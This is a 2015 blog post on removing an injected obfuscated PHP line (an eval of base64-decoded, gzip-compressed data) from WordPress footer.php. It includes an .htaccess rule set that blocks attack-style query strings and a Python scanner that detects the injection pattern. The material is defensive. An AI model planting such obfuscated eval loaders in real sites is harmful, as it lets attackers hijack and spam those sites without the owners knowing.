Thursday, December 3, 2015

Remove FOOTER.PHP Code Injection in Wordpress

WordPress is the most used software for building and designing websites at both the corporate and the individual level. Recent news shows that it is also a framework under attack by hackers. Most recently, a large number of WordPress users were attacked, and most of them did not even know that their websites had been infected. Infected websites showed a decline in Google's SERP (Search Engine Ranking Position). Only by analyzing Google Webmaster Tools can users find out whether their website is infected by code injection. On infected websites the URL structure changes, as shown in Google Webmaster Tools:

www.website.com/index.php?aranovo/2015/wiki/o+que+e+binary+options.pdf
www.website.com/index.php?language/de/virtual-clerk-cash
www.website.com/index.php?AnyotherHackResources

We recently found the code used by the hackers, shown here:

 eval(gzuncompress(base64_decode('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')));  

By removing this code from footer.php and the other WordPress files, users can make their website safe and may be able to get their SERP back. However, fixing only footer.php will not be enough. Users also need to rewrite their .htaccess file with the code given below, which will block the requests used for URL injection. The code to put in .htaccess is below:

 <IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteBase /
 # Answer HEAD, TRACE, DELETE and TRACK requests with 403 Forbidden
 RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC]
 RewriteRule ^(.*)$ - [F,L]
 # Query-string patterns: each [OR] line is an alternative, so one match is enough
 RewriteCond %{QUERY_STRING} \.\.\/ [NC,OR]
 RewriteCond %{QUERY_STRING} boot\.ini [NC,OR]
 RewriteCond %{QUERY_STRING} tag\= [NC,OR]
 RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
 RewriteCond %{QUERY_STRING} http\: [NC,OR]
 RewriteCond %{QUERY_STRING} https\: [NC,OR]
 RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
 RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [NC,OR]
 RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
 RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>|ê|"|;|\?|\*|=$).* [NC,OR]
 RewriteCond %{QUERY_STRING} ^.*(&#x22;|&#x27;|&#x3C;|&#x3E;|&#x5C;|&#x7B;|&#x7C;).* [NC,OR]
 RewriteCond %{QUERY_STRING} ^.*(%24&x).* [NC,OR]
 RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).* [NC,OR]
 RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR]
 RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare).* [NC]
 # Apply the block only to visitors without a WordPress login cookie
 RewriteCond %{HTTP_COOKIE} !^.*wordpress_logged_in_.*$
 # Matching requests get 403 Forbidden
 RewriteRule ^(.*)$ - [F,L]
 </IfModule>
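
To locate the injected line in footer.php and the other WordPress files before removing it, the following scanner is an added example, not code from the original post: it walks a WordPress tree and reports every PHP file and line containing the `eval(gzuncompress(base64_decode(` call shown above. It goes beyond the single sample by also matching the `gzinflate` variant and mixed case or spacing; the function names and the sample tree are constructed for this demonstration.

```python
import base64, os, re, tempfile, zlib

# PHP function names are case-insensitive and whitespace may sit between tokens.
INJECTION_RE = re.compile(
    rb"eval\s*\(\s*(gzuncompress|gzinflate)\s*\(\s*base64_decode\s*\(", re.IGNORECASE)

def scan_php_tree(root):
    """Return sorted (relative_path, line_number, decoder) for every match under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip it and keep scanning
            for m in INJECTION_RE.finditer(data):
                line_no = data.count(b"\n", 0, m.start()) + 1
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits.append((rel, line_no, m.group(1).decode().lower()))
    return sorted(hits)

def build_constructed_site(root):
    """Constructed sample tree: one clean template, two with a harmless injected line."""
    blob = base64.b64encode(zlib.compress(b"/* constructed sample */")).decode()
    theme = os.path.join(root, "wp-content", "themes", "sample")
    os.makedirs(theme)
    files = {
        "header.php": "<?php wp_head(); ?>\n",
        "footer.php": "<?php wp_footer(); ?>\n"
                      "<?php eval(gzuncompress(base64_decode('%s'))); ?>\n" % blob,
        "functions.php": "<?php\n// theme setup\n"
                         "EVAL ( GzUncompress( base64_decode ('%s') ) );\n" % blob,
    }
    for name, body in files.items():
        with open(os.path.join(theme, name), "w") as fh:
            fh.write(body)

def demo():
    with tempfile.TemporaryDirectory() as root:
        build_constructed_site(root)
        return scan_php_tree(root)

if __name__ == "__main__":
    for rel, line_no, decoder in demo():
        print(f"{rel}:{line_no}: eval({decoder}(base64_decode(...)))")
```

Run `scan_php_tree` against the site's document root and review each reported line by hand before deleting it.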
